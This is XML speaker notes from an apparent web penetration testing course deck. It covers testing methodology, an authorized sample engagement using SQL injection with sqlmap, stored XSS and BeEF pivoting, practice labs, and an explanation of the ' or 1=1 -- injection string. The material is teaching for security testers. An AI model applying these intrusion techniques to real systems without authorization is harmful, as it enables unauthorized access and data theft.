      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20582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6FF82F5-B8F2-4841-8DAC-FE733F1DD2D6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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A8B7F91-E6DF-3548-9A78-E2CB64F1B2D6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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During the past five days, we'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ve thoroughly examined different types of web vulnerabilities from the attacker's perspective. We used a four-step methodology as the basis for our hands-on web application penetration testing, at each step gaining information or extending our access within the web application:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Phase 1 - Reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Phase 2 - Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Phase 3 - Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Phase 4 – Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Now, it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s time for us to re-examine these four steps and examine them as an integrated process. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </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A6C645A-790C-C344-8320-A12F8E41AB42}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362499" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36250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It is fundamentally important to recognize that these four steps make up a cyclical process. You can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t simply follow them in order, finish the last step and consider yourself done. Rather, as you expand your access and knowledge, you revisit the earlier steps and repeat the process as appropriate, leveraging your new resources to create new avenues of attack.  The point at which you leverage previously gained results to achieve greater access is commonly called a "pivot."</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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41B429E-86C5-0743-A71C-FAF920C91C5D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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As each vulnerability or new attack vector is identified, it gives us a new foothold into the application. This is called the "pivot." By leveraging pivots, we are able to reach other portions of the site or network that may or may not have been accessible to us. If they were already accessible to us, then we are accessing them in a different way, which is still very valuable in a comprehensive penetration test. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example, when we use SQL injection to port scan the internal network, the SQL injection vulnerability has become our pivot. </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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36454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the next few slides we are going to examine a sample penetration test.  This will let us explore how the various parts of the testing process fits together in a real example.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36454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DE115B8-83A3-8444-AC61-BCAF035E2423}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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F41E9D01-A59F-384F-B6AB-00D3B80B6541}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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attack scenario is a way for us to review the materials covered over the four days.  It also lets us use the process we have learned.  First we will examine a system and the design of the application.  Then we will walk through a complete attack.  This will help us visualize the methods and processes we have just learned.</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CE1F2DB-04BA-9E4A-97FC-E6A04EB15BD4}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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Scenario: HAL is a large manufacturer of servers.  HAL hires a penetration tester named Penelope to determine if resellers are able to access each other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s information.  Penelope will start the test with no privileges within the reseller site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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9513BFF-7352-A84B-B66A-4720E4359EAE}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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HAL has a public site that links people to their reseller site.  The reseller site requires authentication and allows the various resellers to have conversations via forums and request information.  It also allows them to manage their purchases and inventory.  To sign up, users can fill in a form on the main web site.  Sign-up forms are submitted to administrative back-end software, where HAL employees review and approve them.</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D9708D2-4047-6A4E-A67D-29325A95749E}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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Penelope performs a number of Google searches to find information.  She is able to determine that due to the nature of the client, a large amount of the information.  But she was able to determine the infrastructure that was running and found information regarding the various resellers.</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9AD9844-8F2F-FE4F-BA7C-677B69A54FFA}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Penelope uses WebScarab to spider the web site, so that she can examine the pages at her leisure.  She builds a sitemap and determines the relationships between the pages.  At this time, she hasn'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>t found anything interesting, but she is building a wealth of information that may help later.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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AAA3658-94D7-D743-A700-CB80CD1586CF}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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Penelope then starts to examine the reseller sign-up form.  When she examined the source, she found that the developer was using client side filtering of SQL injection code.  By using the interception proxy features in WebScarab, she was able to bypass these filters and submit a single quote to see if an error was returned.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ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21197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cover the injection attacks and how to use them within your test.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21197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FED5D22-5DF0-D845-99F0-40613F33ACF2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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1BBBF12-511A-434D-92CD-B4CC186A36BA}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Using sqlmap, Penelope begins to dump the database tables.  Using this information, she is able to determine what fields need to be inserted and their values so that her account is approved.  She then launches sqlmap to inject a record for her account.  She can now log into the application.</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5C8C97F-810E-5C4A-93CD-F67D52BFDF8A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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Penelope now logs into the reseller site.  She performs some additional searches based on information found up to this point.</a:t>
            </a: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6F5902E-E94C-5A48-B2BC-A4C0BD006E89}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Penelope uses WebScarab to spider the web site, so that she can examine the pages at her leisure.  She builds a sitemap and determines the relationships between the pages.  Penelope finds that most of the site functionality is built to allow resellers ways to communicate with each other.</a:t>
            </a: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9AB6A41-8696-2147-ACAC-A8F000F9E05F}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374787"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At this time Penelope posts a XSS-laden message to the forum system addressed to members of the now in scope reseller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s staff.  She then views the message to verify that the XSS code runs correctly.  It does, and the only step now is to figure out how to abuse this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Penelope works with HAL to expand the scope of the project.  She and HAL get permission to expand into the resellers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' networks.  This will help secure both HAL and the reseller they have contracted with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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0BF5E424-1369-7145-8FF9-8313B4D5C252}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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Penelope decides to use the BeEF system this time, since it will actually let her launch attacks against the other reseller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s network infrastructure and services.  She sits and waits for the member of the reseller's staff to view her message.  When it happens, she quickly uses the port scanner in BeEF to map the other reseller's network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>At this point Penelope can start the process again, now focusing on the internal network of this reseller.  For her purposes, it was enough to use a few Metasploit exploits ported to BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s system to take control of various servers within the reseller's network, and download information to show the level of access she was able to accomplish.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>All of this was possible, because a simple sign-up form was vulnerable to XSS and HAL felt that was an acceptable risk, since only their employees viewed the results of that form.</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Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37683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outline some ideas on what to do after you get back to work.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37683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B681394-9CA3-C549-8507-78E9E5907F44}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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80B906B-3366-204F-AB00-86565D04A604}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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Now that we are almost finished with the four days of exploration, you are probably thinking about what's next.  How do I take what I have learned and continue to grow it.  The next few slides will give you some ideas on where to go.</a:t>
            </a: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112A288-425F-5346-8656-F8BDA0A0343B}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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Practice goes with out saying.  If I don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t practice something then I am going to forget the pieces that are important to be successful at it.  The best way to ensure that you have learned a topic is to do it.  But of course you need to be careful where you practice the techniques that we have learned since they can be malicious.  The class DVD is an excellent place to try out the various ideas.  Redo the exercises.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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402850CB-85C6-5A4E-8B71-DBBBD3034109}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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WebGoat is a self-contained java application that gives the user various exercises to perform.  These exercises test you in various web vulnerabilities and how to exploit them.  The system even includes a hint section so that as you go through the exercises, if you become stuck, you can get help.  As you get further through your study, you can also add other sections to the application.  I find that this is an excellent way to train your developers in specific problems they may find in your environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Mutillidae is a series of PHP files created by Adrian "Iron Geek" Crenshaw to explain and demonstrate the OWASP Top 10.  It can be installed onto a server for us to test against and practice.  He is continually updating the files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>DVWA is another great system that provides various vulnerable applications to attack and test against.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind that all of these applications render the server insecure, so be careful where you use them!</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F5D59CFD-2D28-9D46-86E7-4016062FC844}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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Building an web application lab is probably easier than you think.  All that you need is a web server, a browser and some form or data-store.  I typically use something like VMware or Parallels to build virtual machines that I can install applications onto and then snap back to a known good state after I have been testing them for a while.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The best place to find applications to test is the open source world.  I commonly install things from Sourceforge and test their security.  Then if I find a vulnerability, I report it back to the project.  That way I benefit from using real applications and the project benefits from having someone test their security.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AD9ED41-9978-664B-B315-26D38D431C18}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Injection flaws are a common flaw.  They are flaws where the attacker is able to injection content that the application uses.  The basic issue is that the application is trusting the attacker's content and using it without filtering or with bypass-able filtering.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>When many people look at web security, injection flaws are the ones that they focus the most on.  The flaws are easier for many people to understand the risk they open an organization up too.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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1E0F59C-4936-3E49-880C-F41095CA70A9}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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 find one of the best ways to continue learning is to focus on a specific class of vulnerability and dig into it as deeply as I can.  Learn exactly why it works the way it does and see if you can find new and more exciting ways to use it.  The main goal here is to have fun.</a:t>
            </a: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A8B7756-EAB9-884B-8781-651B8EC54C06}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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And of course, share your knowledge.  I have commonly found students who go on to write whitepapers or document new problems they have found.  Start a developer training program where you can help others learn how to be safer.  And do presentations on the topic.  There are tons of groups looking for people to share this type of information.</a:t>
            </a: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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38400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 have now finished five days of web penetration testing and methodology.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38400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EFEAA95-4B62-1449-A7D3-AC2FE06A82AE}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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E10807CD-7624-4940-83D3-422591D84BB8}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>133</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385027" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38502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web is everywhere. Not only are more and more consumer interfaces moving to the web, but increasingly, applications, appliances and devices are distributed with web-based management interfaces. If you buy a new printer, you use the web interface to configure it. In large organizations, network equipment, air conditioning systems, and other components of critical infrastructure are controlled via the web. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are a number of reasons for this. First, it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s easy to find web developers. Web applications also tend to be very portable. There is a faster development lifecycle, and complex issues such as memory allocation are handled transparently by the scripting language, not by developers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Due to the increasing proliferation and widespread integration of web applications into all aspects of business and operations, web application penetration testing is critical. It is necessary not only for custom-developed in-house applications, but also for commercial off-the-shelf products. Testing should be performed during development, release, and also after deployment as new vulnerabilities are publicized. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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SQL injection is the first of the input flaws that we will explore in greater detail.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21402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05444C7E-42F8-E74F-9C0D-67C50ED8E096}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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15E0705-D2E1-824D-B00E-C714DC5635E6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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 have already talked quite a bit about SQL injection.  The key point to remember is that user input is passed directly to a query with little or no filtering.  Now let's start looking at real examples of how to use it.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' terminates the string in the original.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The or 1=1 returns true for every row.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The -- comments out the remainder of the query that the application was going to place there.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8517FBE-8FB1-AD47-B2CA-F1A2C2B15B03}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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There exists a common misunderstanding that 1=1 is a magic value, because it is so often included as part of SQL injection input examples.  We need to understand that any true value in this place works as well.  As a matter of fact, using a different value may allow us to bypass simple filtering.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D065062-AD00-2D4D-B050-2EFB595C6471}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Most of the work done within SQL injection will use one of these SQL commands.  Using these along with database specific functions, we can control most if not all of the data we have access to through the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Select</a:t>
            </a:r>
          </a:p>
